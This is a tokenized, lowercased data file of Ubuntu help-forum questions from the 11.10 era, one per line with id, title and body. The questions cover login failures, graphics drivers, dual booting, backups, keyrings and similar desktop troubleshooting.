78331	reboot every time i try to log in . how can i fix this ?	there 's a new login screen now with ubuntu 11.10 , and i ca n't figure out how to login . when i click my cursor in the password box the screen goes blank and the computer reboots . three minutes later i try a different method . i 've tried this about 20 times without success . how can i log in ?
78335	backup wubi installation using tar gives permisson denied faults	i have been trying to backup my ubuntu machine which is a wubi installed ubuntu alongside vista . so far i have done the following first i navigated to my external hard-drive then i created a backup folder on this drive and then i entered the following from the terminal : sudo tar cpf mybackup.tgz2 -- exclude= '' /host/* '' -- exclude= '' /media/* '' -- exclude= '' /mnt/* '' -- exclude= '' /proc/* '' -- exclude= '' /tmp/* '' -- exclude= '' /sys/* '' -- exclude= '' /home/*/gvfs/* '' / ( i have also tried , `` /home/ ... /.gvfs '' ) and the process runs through but eventually gives me this message : exiting with failure status due to previous error . i have seen on this forum , that permission denied , could be a reason for a failure status , also , i visited this site : https : //bugs.launchpad.net/ubuntu/+source/gvfs/+bug/225361 , where there is some discussion about .gvfs as having a bug of some sort or another ... the discussion is beyond me but it seems this could be the reason that i have a failure notice , ( if you go to the end of the discussion on this bug site you will see that ubuntu 11.10 still has some problem with this issue ) . so my question is , does anyone know how i can get around this issue and get a clean reliable backup ? i mean a backup with a failure status is not one that inspires me with confidence . thanks for any help , railguide48
78338	is there a docbook reader for following in-progress documents ?	i have docbook2pdf installed , but it seems a bit wasteful to always need to delete and re-create the .pdf file when the source changes . is there a good program for styling and viewing them natively ?
78341	why does rhythmbox use a different version number ?	on ubuntu 11.10 , rhythmbox is 2.90.1 , while it seems to be based on the 0.13 . why is this ?
78343	moving windows from left to right screen in unity	i find myself moving windows around a bit in my two-monitor setup ( oneiric , unity , twinview ) . is there an easy way to move a windows from the left to the right monitor . i know i can move applications from one workspace to another using shift+alt+ctrl and cursor-keys . it would be handy to quickly ( using hot-keys ? ) move especially the maximized windows around without using the mouse since they appear to stick rather strongly to their original monitor and ripping them off with a mouse sometimes requires a few attempts .
78344	how to completely reset/erase the keyring ?	something happened to my keyring , i think chrome asked for a new password to create a new keyring and erased the old one , but now the process repeats . i save a few passwords and then it resets it again . how do i completely swipe/remove/erase the keyring , so that this problem stops ?
78347	how well supported is a thinkpad x121e ?	i am planning to invest in a lenovo thinkpad x121e ( nws5yge 30515yg ) which does not have a preinstalled os . ( shop 's site , sry it is in german ) what i want to know is if the tp x121e is fully supported , and yes what configurations i might have to use . thanks in advance
78352	when to use pkexec vs. gksu/gksudo ?	there are two general ways to run applications graphically as root ( or , more generally , as another user ) . programs like gksu , gksudo , and kdesudo are graphical frontends for sudo . in contrast , pkexec is a graphical frontend for policykit . when manually running programs as root ( or as another , non-root user ) , what are the advantages/disadvantages ( if any ) of using pkexec , compared to the more traditional method of using a sudo frontend ?
78353	xinerama and double buffering ?	is there any way to enable double buffering while using xinerama ? seems its not working because everything is flickering ( conky , lilyterm , tilda , ... ) .
78356	how can upgrade gedit 2.30.4 to version 3 ?	i want to use some plugins available for v3 of gedit .
78360	help ubuntu recognize the s-video cable	is there a way to add a program so that ubuntu will recognize my s video cable ?
78362	how do i move nautilus ' navigation buttons to the left ?	can the `` navigation buttons '' ( forward and back ) in nautilus 3 be moved to the left ? i just find them impractical and confusing on the right . this is nautilus looks by default : i would like to move the forward and back buttons to the left of the `` location bar '' . the search button could be left there . is it possible ? edit : i posted this as as a bug to the gnome developers . if you also feel the toolbar should be customizable , suscribe to the bug report in the following link : https : //bugzilla.gnome.org/show_bug.cgi ? id=664311
78363	how can i change the window shadow size for windows in the gnome shell ?	how can i change the window shadow size for windows in the gnome shell ? i 'm trying the shell out and i like it so far . i know it uses mutter rather than compiz so there 's no ccsm that i 'm used to . but i understand you can configure almost everything within /usr/share/gnome-shell via css and js . awesome anybody know where the window shadow line is ?
78364	ati graphics card , with gnome shell , screen flickers	after installing gnome shell , without any problem , after log in the fonts are missing and it looks like crap ... nothing is readable . do n't want to make it a double post , because my issue is similar to the one from this question but for me the problems have not been solved properly . after running the commands from that post , and installing the latest amd 11.10 driver , the gnome shell display issues have been solved . but each time i move the mouse in the upper left corner , to bring up the applications ... my entire screen flickers . without the applications been displayed , everything looks fine . hardware : ati hd4870 , intel q6600 .
78366	problem after nvidia gt520m driver install	today i tried to install the nvidia driver ( from their website ) for my nvidia gt520m on my 11.10 ubuntu . i have stop lightdm so as to not have the `` xserver problem message '' and the install was good but now when i restart my laptop , i do n't have the normal colors and cases to put my password but only text in black and white.. like `` *starting anac ( h ) ronistic cron anacron [ ok ] *starting deferred execution scheduler atd [ ok ] *starting periodic command scheduler crond [ ok ] *checking battery state ... [ ok ] *running local boot scripts ( /etc/rc.local ) [ ok ] `` could anyone help me please ? edit : thank you for your link ! but now i make a `` sudo sh nvidia.run -- uninstall '' so as to uninstall the driver i installed today and the problem is that i do n't have anything after the violet page with `` ubuntu '' and the orange & white points.. i only have a blackscreen & ctrl+alt+fx doesnt work do anyone have an idea to fix it or am i obliged to reinstall ubuntu ?
78374	how to change username in top-right panel ?	so i used 'users and groups ' option under system to change my username and home directory , but even after i restarted , the top-right session panel has my old username . how can i change it ?
78377	how to know my gtk version ?	i want to know my gtk version ( i am working on ubuntu 11.10 ) using a command line or any thing
78384	which process reads xft font settings ?	i use the blackbox window manager and in my ~/.xresources file i have a number of settings , like xft.antialias and xft.hinting , which affects how fonts are rendered . when i login from lightdm theses settings work as i expect but when i login from a console and run x windows with startx the font rendering is different . which daemon do i need to add to .xinitrc to make the font renderer use my font settings ?
78389	desktop top is lower than it should be	i have a very odd problem with ubuntu 11.10 . here is a picture of it : the window in the picture is maximized , but for some odd reason it does not cover the entire desktop area . that area of the desktop the window does not cover is a dead area - i also ca n't drag desktop items to there , though i can drag not-maximized windows to that area . rebooting does n't help . the problem started after i configured some windows partitions to automount on startup ( though i do n't see how that could cause the problem ... ) does anyone know a way to fix this ?
78390	how do i install flash player 11 debug version in 11.10 ?	i want to replace my existing browser plugin flash player with the debug version , and update to fp11 while i 'm at it . i also want to install the debug version of the projector player and make it the default player for swf files outside of the browser . first the browser plugin version . i 've downloaded the installer from the official site , but i 'm not sure what to do with the contents . there is a usr folder , and i presume that i am to write the contents of this to /usr . there is also a file called libflashplayer.so , and i have no idea what to do with that . for download for the projector player has confused me further because it only contains one file : flashplayerdebugger . i do n't know what to do with this . if there is a way to install these softwares through apt-get or the software center i would love to hear about it , i have only found solutions for the standard player , but otherwise could someone please tell me what to do with these files ? update ok , so i 've figured out that if i dump the flashplayerdebugger file into /usr/lib/ i can point eclipse at it and compile and test swfs as expected from inside eclipse . but how can i set that application as the default player when i select an swf in nautilus ?
78391	why ca n't i run compiz ?	i installed ubuntu 11.10 on my laptop . the main reason i switched to ubuntu is because i wanted to use compiz . the first thing i did was to go to additional drivers and install ati/amd proprietary fgrlx graphics driver . there was also another one available , ati/amd proprietary fgrlx graphics driver ( post-release updates ) , but i did n't install that one , because it basically meant the same thing to me as the one i already installed . next , i went to the ubuntuguide.org oneiric wiki http : //ubuntuguide.org/wiki/ubuntu : oneiric # compiz_fusion so i followed the instructions there and ran this command in terminal : sudo apt-get install compiz compizconfig-settings-manager compiz-fusion-plugins-main compiz-fusion-plugins-extra emerald librsvg2-common but then , the terminal window said that the package `` emerald '' could not be found . so , i ran this command instead : sudo apt-get install compiz compizconfig-settings-manager compiz-fusion-plugins-main compiz-fusion-plugins-extra after that , i installed fusion icon by running this command : sudo apt-get install fusion-icon i restarted my computer , searched for compiz config settings manager , and clicked on it . then , i activated wobbly windows . i logged off and logged back on again , but there was no wobbly windows effect . so i tried clicking on fusion icon , but it never started . can someone please tell me what i did wrong here ? because i see everyone seems to be able to run compiz except me . i really need to start compiz , or else i think i 'm going to uninstall ubuntu .
78393	how do i add a `` new window '' entry to the nautilus quicklist ?	when i right click on 'file manager ' in the launcher i can select 'home folder ' , but it takes an open nautilus window and displays the home folder in that window , often shunting me back to a different workspace . how can i open a new nautilus window from the launcher ?
78395	how do i integrate lightning with the messaging menu ?	is there any way to integrate the events on lightning calendar with the the unity calendar section ? of course i would like to do this preferably without having to install evolution . thanks for your help .
78400	how to report a crash bug with nothing on screen	i would like to report an installation bug , but i ca n't launch ubuntu-bug : on my tablet ( ldlc janus , an intel based tablet without os installed by default ) , i have a problem when i install ubuntu 11.04 or 11.10 . once the installation is finished , when i reboot , there is absolutely nothing on screen , but ubuntu boot correctly anyway : i choosed auto-login mode and i can hear the login sound . even if i ctrl+alt+f1 or f2 ... there is nothing . but the livecd works fine ( even touch screen even if without multi touch ) . i tried to install 10.10 it works , but as soon as i upgrade the same problem occure . i installed fedora 15 and then fedora 16 ( because of other problems ) and no problems with them . i would like to report this bug on launchpad but i do n't know how to do to give devs logs files and other useful files which could help debug . thanks a lot for your answer , i would really prefer using my tablet with ubuntu ( i miss u1 , usc , unity ) bug reported here : https : //bugs.launchpad.net/ubuntu-friendly/+bug/889459 do you know if this is the good place , and what is needed more ?
78402	problem with all fn keys for thinkpad w520	i have a problem with the fn . i used a live version of ubuntu 11.10 on a usb stick to install ubuntu on my thinkpad w520 . the fn keys worked perfectly in the live version , but do not work in the installed version . i would like to know what i have messed up . i ca n't seem to find the fix on google , except for inserting the shortcuts by hand , which seems a little brutal , since i know they can work without prior configuration . thanks in advance . edit : the keys just started working out of the blue . i do n't really know what my system did or what maybe i did . however all keys work fine now . sorry for putting this now useless question here .
78403	`` apt configuration problem . an attempt to configure apt to install additional packages from the cd failed ''	i am trying to load v11.04 onto my hp desktop hard drive using a usb drive . i used the same usb drive to load the system on my dell netbook and it loaded successfully . but trying to load on the desktop i get the error apt configuration problem . an attempt to configure apt to install additional packages from the cd failed the installer then crashes . i have nothing in the cd drive . i can boot the system from the usb drive and it works fine . i have tried all options on the load with the same crash each time . i baffled as i successfully loaded my netbook with the same usb with no problems .
78406	can not install vim	i am running ubuntu 11.10 , as xubuntu , in an amd 64 pc , configured as dual boot with windows 7 . i tried installing vim with this : sudo apt-get install vim i got this error message : the following packages have unmet dependencies : vim : depends : vim-common ( = 2:7.3.154+hg~74503f6ee649-2ubuntu2 ) but 2:7.3.154+hg~74503f6ee649-2ubuntu3 is to be installed e : unable to correct problems , you have held broken packages . i only have a very faint idea of what the problem is , and none whatsoever on how to correct this . hope you guys can help .
78410	how can i get the buttons back on the left side in gnome ?	i installed ubuntu 11.10 along with gnome 3.2 . under gnome 3.2 , the window buttons for closing , minimizing and restoring are on the left side . i got used to ( and like ) the buttons being on the left hand side . how can i get those buttons back on the left side ?
78427	data recovery after crashing with seagate 320gb ?	just installed 11.10 last week and decided to transfer itunes music ( from windows dual boot ) to my seagate 320gb . i left it in , restarted , clicked ubuntu at the boot screen , and then it froze after a few lines of code ! i think i got to 3.7086 or something before i pressed ctrl+alt+del and the system restarted after another few lines of code . i am completely new to ubuntu so after googling , i made a live cd with 10.04 , the most stable release i 've heard , and i 'm typing this from there now . however , when i go to mount my partition , only the windows vista partition ( 308gb ) is there ! it has all my windows files but my ubuntu 11.10 ones are nowhere to be found . i need to restore these pictures i transferred from my camera using shotwell the other day ... any help is appreciated ! p.s . 11.10 has never crashed on me in my trial week , so i 'm guessing it 's the seagate hard drive 's fault . however , now i 'm running it on 10.04 and it works fine .
78428	configuring graphical desktop on linode vps	i 'm experimenting with using a linode vps as a development box for my rails projects , so i 'd like to set up a gui environment to run a few basics , like google chrome for debugging . there is a pretty good tutorial on installing vpc and gnome here , and i 've followed it closely . everything seems to run correctly , but when i try to log in from the vnc client , i 'm getting a message : failed to load session 'ubuntu . ' this is on a default gray screen accompanied by a logout button and black x. i 'm thinking the issue is with my .vnc/startup file , but i 'm not sure where to start troubleshooting . i tried logging in from different clients on windows and my local ubuntu box . i also tried rebuilding the vps from the start and got the same result . any suggestions ? edit : i checked the session log file , and here are the errors reported . i 'm thinking the font errors are n't a big deal , but the security policy error seems like a problem . xvnc free edition 4.1.1 - built sep 7 2011 11:26:15 copyright ( c ) 2002-2005 realvnc ltd. see http : //www.realvnc.com for information on vnc . underlying x server release 40300000 , the xfree86 project , inc sat nov 12 04:54:40 2011 vncext : vnc extension running ! vncext : listening for vnc connections on port 5901 vncext : created vnc server for screen 0 error opening security policy file /etc/x11/xserver/securitypolicy could not init font path element /usr/x11r6/lib/x11/fonts/type1/ , removing from list ! could not init font path element /usr/x11r6/lib/x11/fonts/speedo/ , removing from list ! could not init font path element /usr/x11r6/lib/x11/fonts/misc/ , removing from list ! could not init font path element /usr/x11r6/lib/x11/fonts/75dpi/ , removing from list ! could not init font path element /usr/x11r6/lib/x11/fonts/100dpi/ , removing from list ! could not init font path element /usr/share/fonts/x11/type1/ , removing from list ! could not init font path element /usr/share/fonts/x11/75dpi/ , removing from list ! could not init font path element /usr/share/fonts/x11/100dpi/ , removing from list !
78431	`` documents on xxxx 's iphone `` folder opens up when i plug in my iphone	everytime i plug my iphone into my computer ( ubuntu 11.10 ) a folder pops up titled `` documens on jamie 's iphone . '' how do i stop this ? initially it asked me what i wanted to do , but i must have hit something on accident to choose to open a folder . thanks !
78434	fn keys stopped working after a ubuntu update	i received a system update that seems to have stopped my fn keys from working on my laptop . what should i do ?
78440	i ca n't see window list on the bottom panel	i 'm not seeing any window list on the bottom panel . how to get it back ?
78447	how to create list of installed packages for remove after testing ?	i like to test kmymoney . when trying to install there are a lot of kde packages that are needed by this program . that 's ok , i 'm using unity and there are no kde packages installed at this moment . so , when i like to remove all this packages after testing kmymoney , how can i do that ? sudo apt-get install kmymoney > > /some/folder/kmymoney.txt gives me the output of apt-get , but that 's not what i 'm looking for . is there a way to remove this packages properly ? thanx in advance w .
78452	logitech c310 webcam video problems	i 've just installed a logitech c310 webcam on my ubuntu oneiric machine , and i 've got several problems . when i use cheese , if i set it to use the higher resolutions , the picture contain shadows and has distorted colors . only with lower resolutions the picture looks okay . the above photos were taken with cheese . in addition , the camera 's internal microphone did n't always work . when using it through pulseaudio , the sounds were fast and with high pitch . when using it directly through alsa it sounded fine . any ideas ? edit : i moved the sound part to a new question .
78453	headphone speaker jack on 2011 imac	i have just installed ubuntu 11.10 on my new 2011 imac . everything works great except the headphone / speaker jack . does anyone know how to get it to work ?
78454	how do i set default screen size for headless machine ?	vanilla 11.10 install . i want the default resolution to be 1920x1080 instead of 1024x768 when i access from a windows 7 box using tightvnc client . i 've not installed any new vnc s/w on ubuntu . where is the default resolution defined ( or assumed ) when no monitor is attached ? i am very new to ubuntu . thanks for any help .
78457	why do n't windows of the same application behave as they should ?	somewhere along the upgrade path , unity has developed some strange logic behind window layering . first , before oneiric , there was a way to see all the windows of an application - i think it was when you click on the icon in the launcher . now , clicking on the icon often does nothing . suppose i have two terminals open , one behind this firefox window , and one in front of it . clicking on the launcher does nothing - the only way to find the second terminal , afaics , is to move the firefox window or use the task switcher . secondly , once i have both terminals on top , then i decide to close one of them , suddenly they both disappear ( the second one , for some reason , has gone into hiding behind the firefox window ) . third ( though i ca n't pin it down now ) , sometimes when a window is on top , focus is still on a window in back ; i click on the top x to close the window in front , only to find i 've closed an important window in the back . ( update : this question details the problem ) i ca n't really believe these are bugs , since they seem too obvious to not have been fixed by now . my question is , am i missing something ? some compiz option i can set to make it act like it used to ? or is this really how unity is supposed to act ?
78458	format option not available in 11.10 as in 10.10 ?	i 'm using ubuntu 11.10 on my laptop and ubuntu 10.10 on my desktop . in 10.10 there is an option to format a pen-drive by right-clicking the icon for the pen drive and selecting format , but i am unable to find it in 11.10 . there are tools for that ... but is n't there any default tool available for this ?
78467	where is directory for keyboard indicator flag picture in gnome 3 ?	for unity environment , i know it is /usr/share/pixmaps/flags + change setting org.gnome.libgnomekbd.indicator to true , which is totally successful . but for gnome-shell , both default and classic , system can not finds the flags and displays the `` picture not found '' picture instead . so where is the gnome-shell directory for keyboard indicator flag ? does it exist ?
78472	boot process enters an infinite loop after installing ubuntu 11.04 together with windows 7 and xp	i have a new computer acer aspire x3960 which came with windows 7 preinstalled . i made a new partition where i installed windows xp and then i installed in new logical partitions ( a swap , a / and a /home partition ) ubuntu 11.04 . at the end of the process , the computer enters the very first screen where it says `` press del to enter bios setup , press f12 to enter boot options '' . after a few seconds , the screen goes blank , the computer beeps and then it presents the same screen again . it does n't even ever go to the grub options of which operating system i want to start . it just loops there forever . i tried to fix the ( eventually damaged ) grub following these instructions ( unfortunately in german ) http : //wiki.ubuntuusers.de/grub_2/reparatur from a liveusb , which i 'm also using to post this question . now i found here that someone asked for the results of the boot info script . here is mine ( i hope i did right in trying to upload the file ) : http : //paste.ubuntu.com/736032/ can anybody help ? thank you very much . andreafc
78473	how to create a debian package to delivering fonts to users local directory ?	i want to distribute few fonts that packaged within a debian package . fonts should go to '~/.fonts ' directory not to '/usr/share/fonts ' . so every user can install fonts locally , not effecting system fonts . i am almost certain about creating a debian package and tried creating one . but when i tried to install , it asks me for superuser privileges . please help on this . thank you .
78474	altgr keys do n't work with ubuntu in virtualbox	i just installed virtualbox ( from oracle ) in windows 7 , and created a virtual machine with latest ubuntu . here in firefox i can use the left ctrl key , while the right one does n't have any effect . however , i ca n't use the altgr key ( also known as right alt ) to produce e.g . curly braces like { } ( i pasted that via ctrl+v ) . in a terminal window i can switch the `` input method '' to `` multipress '' , and then i can use altgr to type e.g . { } , which is how i produced those characters for this posting . however , with `` multipress '' the ctrl keys seem to have no effect whatsoever . so in order to e.g . type ctrl+d i have to right click and switch the `` input method '' to `` system ( ibus ( intelligent input bus ) ) '' . then altgr does not work . i tried specifying the compose key in the system settings keyboard layout . with that , neither ctrl nor altgr worked . here 's what xmodmap reports : [ ~ ] $ xmodmap -pke | grep -i control keycode 37 = control_l nosymbol control_l keycode 105 = control_r nosymbol control_r [ ~ ] $ xmodmap -pke | grep -i alt keycode 64 = alt_l meta_l alt_l meta_l keycode 204 = nosymbol alt_l nosymbol alt_l [ ~ ] $ _ how can i fix this ? additional info : the keyboard is a standard pc keyboard , a logitech k120 , with norwegian layout . also , i first tried asking this question over at the superuser site but no response after 2 days ...
78475	is there a way to export/import the system settings ?	i 've just installed 11.10 on a samsung n130 netbook . i 've tweaked it a little to accommodate the low hardware power . almost all the config was done through the default `` system settings '' menu , and i 've also tweaked some `` advanced '' features through gnome-tweak-tools . i know that i 'll have to install 11.10 on machines with almost identical hardware in the coming weeks . i would really like avoiding manually changing config options in the gui every time . is there an easy way to export all those config changes so i can easily import them in a brand new 11.10 install later ?
78476	how are backports implemented in ubuntu ?	in do '..-backports ' repositories automatically take precedence over the standard repos ? in sources.list , the answer says that backports are never automatically used to update a standard package in the newer versions of ubuntu . how is this actually implemented ? i 've read something about pinning , but there is no /etc/apt/preferences file on my machine , and yet it shows the behavior explained in the answer . where is the special status of the backports repository actually configured , and how does apt know which packages have already been updated from there ?
78484	i want to change the position of the launcher items	i have added a quicklist launcher to unity , it sits at the bottom of the list , i want to change that to another position easily with minimal effort / programs . ie : i want to move firefox from being the 2nd item in the list to the first position bellow the dash button . how can i do that ?
78487	changing to tty ( ctrl-alt-f1 ) produces black screen ( proprietary nvidia driver )	ubuntu 11.10 works really well with my nvidia gts 450 except that when i try to change to a tty ( ctrl+alt+f1 to f6 ) all i get is a black screen . i can get back to gnome shell with ctrl+alt+f7 . i believe i 'm using the 280.13 driver . any ideas ?
78488	how do i install matlab ?	i have one problem so please help me . i have ubuntu 11.10 and want to install matlab ; i searched a lot in internet but have not found the exact way yet . please help me guys , i need it very much . i know command line , but i do n't know what kind of command i should use ; i have installed 32 bit library ia32-libs , so what is additionally necessary ?
78494	shall i install ati drivers , or keep the open source ones for now ?	shall i install the ati drivers from jockey ( which i think are 11.8 ) , download the latest from ati.com or continue with the open source pre-installed gfx drivers ? im running ubuntu 11.10 with kde desktop installed . i have an acer aspire 5552 laptop , amd x3 processor with ati 4250 graphics . i just want a stable computer ! i use ubuntu to watch movies , encode films , listen to music . hope you can advise me ! kind regards
78495	how to change sound driver ? ( pulse - > oss )	i think ubuntu is set by default to use pulse audio driver . how do i change to oss ? some softwares that i am using only allow this type of sound driver to use corectly the sound system . thank you for any advice .
78499	does installing multiple desktop environments affect performance ?	i love having multiple des on my linux laptop ... i currently have unity , gnome3 , gnome classic and openbox . would this mean slower performances ? thanks a bunch ! alex
78518	how to make terminal transparent while still having its own background image ?	is there a way to give terminal specific background image and make it 50 % transparent at the same time ?
78520	i reformatted my computer to a new os - need to restore files and folders	i did see on another question that files and folder will automatically start synching . i want to make sure if i synch the the ubuntu one folder on my computer with windows 7 it will download all the material stored on-line and not delete anything . thank you .
78522	how to open the unity dash when hitting the top left corner of the screen ?	how to open ubuntu unity dash when hitting the top-left corner of the screen ( i am working on ubuntu 11.10 ) , just like in gnome-shell ( i love this feature ) . using compiz or anything else .
78527	can not dual-boot windows 7 and ubuntu ?	i had ubuntu 11.10 on my laptop , then i determined to install windows 7 and keep both of them on my machine ( dual boot ) , then i installed window 7 . and then windows 7 was running , but ubuntu did n't appear in the grub menu . i then ran ubuntu from a live usb disk and edited grub to make ubuntu boot : sudo mount /dev/devicename_from_step_one /mnt sudo rm -rf /boot sudo ln -s /mnt/boot /boot now ubuntu 11.10 is booting automatically when the laptop start , but windows 7 does n't appear at all in the grub ( there is no grub menu at all ) . now i want to let windows 7 appear in the grub menu to let me choose ( ubuntu + windows 7 ) . i 've read these commands but it does n't work with me : sudo gedit /boot/grub/menu.lst a large text file will open and at the bottom leave a line and add this : ( just a blank text file opened with me -not a large one- i do n't know why ) title windows 7 beta ( loader ) root ( hd0,1 ) savedefault makeactive chainloader +1 do not type this line but if that does not work on re-boot try hd0,0 or hd0,2 and so on until it works .
78532	mount.ntfs using all the cpu while trying to run a program	i 've used ubuntu for years now , but i 'm currently trying out wubi to launch ubuntu 11.10 on a windows 7 system without repartitioning . it comes up just fine , but when i try to install springsource tool suite ( sts ) under ubuntu ( under /home/admin ) , the system reliably stops responding mid-way through with the disk running and the system completely unresponsive . the last time i tried it , i left a terminal window open with top running and saw that mount.ntfs was sucking up all the cpu just before the screen hang .
78534	where is the keyboard mouse feature in gnome 3 ?	i 'm using gnome 3 on ubuntu 11.10 . i 've used keyboard mouse ( accessing mouse with keyboard ) earlier by pressing control+shift+num to activate it ( see http : //www.noah.org/wiki/linux_keyboard_mouse ) . however , i can not use it now . how do i activate it ?
78535	how to install libimobiledevice ?	just as the title states how do i install that library to manage my iphone ?
78538	unble to use administrator account created without password	i installed ubuntu 11.10 two days back . today i added a user named vivi and set it to administrator . and i just changed vivek , my username , to standard user . now , since i created new user vivi , i have not supplied any password for it , yet i am unable to perform any administrator actions . can anybody help me to restore administrative privileges ?
78541	how do i set idle as the default editor for python scripts ?	i would like to set idle as the default editor for python scripts , but when i click on `` open with application '' and hit the dropdown to show more applications it is n't an option . here 's exactly what i am doing ... right-click on .py file on my desktop . right click on properties . click on the open with tab . there is no `` use a custom command '' option . the same thing happens when i right click on the file and select `` open with other application '' . do you of any way i could set this up ?
78544	ubuntu missing from boot menu after setting up dual boot	i just installed 11.10 on my lenovo z570 with 750gb hdd via a usb . after the installation when i turn the computer on i do n't get an option to choose the operating system and when i check the hdd in windows it will state the hard drive is 370gb instead of 750 . the installation ate away 300 gb .
78546	what application is responsible for saving num lock preferences of a user ?	on a normal installation , if i unlock the numpad , it will remain so every time i log in . however , on my minimal installs , numpad is always locked at every log in . what do i need to install to let the computer remember my num lock preferences ? i did not find the numlock article of community ubuntu documentation helpful .
78547	is there a music player that can play the sound from a youtube film ?	i want to play this song but i do n't want to see the video . is there a music player that can do that and please tell me how to do it ? the youtube link is just an example , do n't put too much interest in it .
78549	how do i install adium themes in empathy ?	i had used the adium themes in empathy in ubuntu 11.04 but the same did not work for 11.10 . is there any workaround to enable the themes for empathy in 11.10 thanks in advance
78559	for thinkpad w510 brightness does not work	after upgrading up ubuntu , and installed the additional drivers , and i tried bot the options that i got , and the brightness key do not work . what i mean by not working is that it shows me the bar as to it is moving up and down , but it does not change the display brightness . any way to fix this .
78560	novice user ... firewall	i 've recently ditched windows 7 for ubuntu 11.10 64bit ... i 'm a total novice and was wondering do i need to make any changes to the firewall ? . i read somewhere that the built in firewall does n't need touching ... but a friend says he uses firestarter , i 'd be really grateful if someone could advise me weather to just leave well alone or if i should make certain changes , i 'll be doing a lot of web browsing and also proberly a bit of online banking to . infact this is one of the reasons i 've switched to linux as i was told its much more secure than windows ... i just want my comp to be setup in a way that i can access my bank account safely and not knowing what to do about the firewall or how to configure it is off putting ... also do i need an antivirus ? ..i know bitdefender and eset do a free linux scanner but again i 've heard there not really needed . thanks in advance to anyone who can answer my questions ... much appreciated . dave ...
78561	software center has a blank window	i ca n't launch the software center anymore . i 've got a blank window each time i try to open it . i have tried to repair it by typing `` software-center '' in synaptic packages manager , and i selected it for reinstall , but it still does n't work . i 'm on ubuntu 11.10 . can you help me please ? running sudo apt-get update did n't fix the problem here is the standard output seen on the console : 2012-06-21 17:15:58,122 - softwarecenter.ui.gtk3.em - info - em 's : 17 15 21
78562	cant install/compile utorrent from tar.gz source	i tried to install/compile utorrent like that : sudo ./configure make make install and like that : sudo ./configure -- prefix=/path make make install and like that : sudo ./configure -- enable-static-link \ -- prefix= $ xxx/static -- with-curses & & make & & make install and it did n't work ! i get error : ./configure : no such file or directory .
78564	wireless does n't work after installing 11.10	i just did a fresh install of 11.10 32 bit and i ca n't get my wireless to work . i installed the drivers the broadcom sta wireless drivers through additional drivers and rebooted , but it still does n't see any wireless networks did something change in 11.10 that makes the wireless card not work anymore ? i was using 10.10 before , and it worked fine . do i need to go back to 10.10 ? sudo lshw -c network [ sudo ] password for user1 : *-network description : ethernet interface product : netlink bcm5784m gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 10 serial : 00:1f:16 : be:55 : ff size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.119 duplex=full firmware=sb v2.19 ip=192.168.0.70 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:43 memory : f0300000-f030ffff *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0400000-f0403fff
78565	files in /home deleted	in the most specific , unemotional terms : reinstalled os , using 11.10 ( 1 month after release to skip initial issues that usually crop up ) . configured system to my specifications ( just ways of organizing config files , etc ) . log out log back in after after an hour or so ... to find my home directory obliterated and just a few skeleton files existing . think oh well , try again ( this has happened before with an install for reasons i 've never been able to pinpoint , usually around install time with some sort of update but its never been a major recurring issue ) same thing happens i thought something was awry , so i reinstalled again ( another 20 minutes , meh ) set up system , arranged home directory a bit differently thinking maybe i tread on something i should n't have . log out , come back -- - the same thing . most of the directories i added were deleted ( e.g . .xmonad which links to xmonad.hs in my portable config directory ) tl ; dr every change i make in my home directory gets deleted . i 'll willingly fill in details as needed , this was just a start to see if anyone can help , i 've found no trace of this issue in a search . edit : mount/df -h info , in the spirit of being helpful /dev/mapper/sda1_crypt on / type ext4 ( rw , errors=remount-ro , commit=0 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) temp on /tmp type tmpfs ( rw , noexec , nosuid , nodev , noatime , size=700m , mode=1777 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) vartemp on /var/tmp type tmpfs ( rw , noexec , nosuid , nodev , noatime , size=50m ) /dev/sdc1 on /boot type ext4 ( rw , commit=0 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/ka/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ka ) filesystem size used avail use % mounted on /dev/mapper/sda1_crypt 19g 4.4g 14g 26 % / udev 3.9g 4.0k 3.9g 1 % /dev temp 700m 16k 700m 1 % /tmp tmpfs 1.6g 928k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 4.0g 1.3m 4.0g 1 % /run/shm vartemp 50m 8.0k 50m 1 % /var/tmp /dev/sdc1 369m 39m 312m 12 % /boot note , none of the directories/files are files that would be outside my home directory , i.e . nothing weird or obscure , just config files that would be there to begin with . my tmp/vartmp are non standard ( memory only mounted on boot ) , perhaps i need to look at those again ( which i have n't for a while ) . the install is on an encrypted lvm if that counts as well . edit2 : with a fresh install , doing only incremental and least radical changes , this happened yet again . this was after i went into an xmonad session , after installing chromium-browser . so one of two issues : my xmonad session ( where i start gnome-settings-daemon , no problems previous although that would be my immediate random guess ) or the chromium-browser install . still really , really irritating and preventing from moving on with my install : / edit3 : still happening , even with the merest changes . i 've had problems with ubuntu , but this is an issue with the ubuntu i 've grown accustomed to using . edit4 : suggestions on another forum indicate that this could be an issue with the encryption , which i use in setup but am not an expert in understanding its inner workings . i can find no trace of my specific issue , but then again i 'm not sure where to look ( meaning , i use ubuntu but i 'm not at all conversant with bug/issue searching because i 've had few problems and have been able to solve what few problems that cropped up ) . i may just install 10.04lts in the meantime .
